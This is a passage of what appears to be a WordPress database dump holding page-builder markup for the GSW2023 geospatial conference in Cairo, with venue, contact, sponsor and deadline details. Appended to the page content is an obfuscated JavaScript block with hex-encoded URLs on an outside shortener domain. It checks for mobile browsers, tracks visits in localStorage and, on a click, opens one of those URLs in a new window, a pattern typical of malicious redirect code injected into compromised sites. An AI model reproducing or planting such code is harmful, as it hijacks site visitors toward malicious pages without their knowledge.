main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:29:35','2023-05-17 05:29:35','',3066,'https://gsw2023.com/?p=4530',0,'revision','',0),
(4531,1,'2023-05-17 05:39:10','2023-05-17 05:39:10','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" 